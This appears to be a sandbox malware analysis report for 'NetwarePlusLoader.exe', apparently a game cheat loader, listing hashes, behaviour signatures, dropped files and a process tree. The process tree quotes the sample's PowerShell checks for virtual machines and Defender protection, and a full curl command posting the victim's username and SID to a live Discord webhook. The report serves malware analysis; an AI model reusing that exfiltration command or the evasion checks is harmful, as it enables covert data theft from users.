aa63c6173e2e2efde08a3f79dab049f60a154f26e4dbe50ed4dbf8202cc9bd68

General

Target

NetwarePlusLoader.exe
Size

19KB
MD5

cccba858d17e22638671a303b2288eea
SHA1

a82db82ff54f8a77fda21e4b261ed5e189465fda
SHA256

aa63c6173e2e2efde08a3f79dab049f60a154f26e4dbe50ed4dbf8202cc9bd68
SHA512

13f9312c9e8b602e593c8741f326b119eab20ba3d97d483092255cd6a9ce216fa4e8347bb04e7e6b58425245ba46d22d31de1f4d2533e0e04972e27cab763487
SSDEEP

384:hVGNrJbtM9LbHKXzEMu+2cXxIaLgphDFzycZnZcZHqvuqVxGf9zCeH:hVsrN6bQv2cXxIaEhDhyq7GQ

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2892	powershell.exe
2612	powershell.exe
2436	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	2436	powershell.exe
Token: SeDebugPrivilege	2744	NetwarePlusLoader.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2744 wrote to memory of 2892	2744	NetwarePlusLoader.exe	29
PID 2744 wrote to memory of 2892	2744	NetwarePlusLoader.exe	29
PID 2744 wrote to memory of 2892	2744	NetwarePlusLoader.exe	29
PID 2744 wrote to memory of 2892	2744	NetwarePlusLoader.exe	29
PID 2744 wrote to memory of 2612	2744	NetwarePlusLoader.exe	31
PID 2744 wrote to memory of 2612	2744	NetwarePlusLoader.exe	31
PID 2744 wrote to memory of 2612	2744	NetwarePlusLoader.exe	31
PID 2744 wrote to memory of 2612	2744	NetwarePlusLoader.exe	31
PID 2744 wrote to memory of 2436	2744	NetwarePlusLoader.exe	33
PID 2744 wrote to memory of 2436	2744	NetwarePlusLoader.exe	33
PID 2744 wrote to memory of 2436	2744	NetwarePlusLoader.exe	33
PID 2744 wrote to memory of 2436	2744	NetwarePlusLoader.exe	33
PID 2744 wrote to memory of 1076	2744	NetwarePlusLoader.exe	37
PID 2744 wrote to memory of 1076	2744	NetwarePlusLoader.exe	37
PID 2744 wrote to memory of 1076	2744	NetwarePlusLoader.exe	37
PID 2744 wrote to memory of 1076	2744	NetwarePlusLoader.exe	37

C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe
"C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" (Get-MpComputerStatus).IsVirtualMachine
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2892
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" (Get-MpComputerStatus).RealTimeProtectionEnabled
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2612
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" (Get-MpComputerStatus).IsTamperProtected
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2436
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c curl "https://discord.com/api/webhooks/1238779433968734299/J8iIiiD6Ybfe6unq7k5Ch5CciciM-cz86PtTft82kqQTl9rMPR5VVWAgjCg-9GIsyRoC" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""everyone\nSomeone Injected!\nAdmin | S-1-5-21-330940541-141609230-1670313778-1000"",""embeds"":null,""avatar_url"":""https://cdn.discordapp.com/avatars/1191678925055737867/9af2e220817c7d8265ce700fba05e989.webp?size=1024&format=webp&width=0&height=256"",""attachments"":[]}"
  2⤵
  PID:1076

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
03a3eb7d759b7816d00d67e1820c908a

SHA1
bf7bff5144e348b5652fb8416ae178f4ff9843ac

SHA256
5a9675c0352e6b8fdf81fa092134670edbc424969a449e3d0628db6da9a0bb4f

SHA512
84007e9fa30e3238fdcb6763ca72937ecc5ea4955855fdc26babac2bbf63f657949a12febbff2b8189c6c2960b2ca40d38051f6cdb2f0b25875e366f728e8fa0

Download Submit
C:\steamapps\common\1v1.LOL\.doorstop_version

Filesize
5B

MD5
495063beeac89309a2247ce9c13ed292

SHA1
063ee00ca80d81e068dd404b59ceb2a03b2e7109

SHA256
b4116d6e880009dc1440ddab7ec054bcea529aea394ec5bab7943b415a359281

SHA512
cac6de984822cd7cf97611897611873cb5951b9a63f75a46a54aa6c0d2f3565419a1aa574c657df94a7057d85b99515753615b7336d96a7ff9463a0f3dbf3ffa

Download Submit
memory/2744-0-0x000000007486E000-0x000000007486F000-memory.dmp

Filesize
4KB

Download
memory/2744-1-0x0000000000ED0000-0x0000000000EDC000-memory.dmp

Filesize
48KB

Download
memory/2744-21-0x000000007486E000-0x000000007486F000-memory.dmp

Filesize
4KB

Download
memory/2892-4-0x00000000718E1000-0x00000000718E2000-memory.dmp

Filesize
4KB

Download
memory/2892-5-0x00000000718E0000-0x0000000071E8B000-memory.dmp

Filesize
5.7MB

Download
memory/2892-6-0x00000000718E0000-0x0000000071E8B000-memory.dmp

Filesize
5.7MB

Download
memory/2892-7-0x00000000718E0000-0x0000000071E8B000-memory.dmp

Filesize
5.7MB

Download
memory/2892-8-0x00000000718E0000-0x0000000071E8B000-memory.dmp

Filesize
5.7MB

Download
memory/2892-9-0x00000000718E0000-0x0000000071E8B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads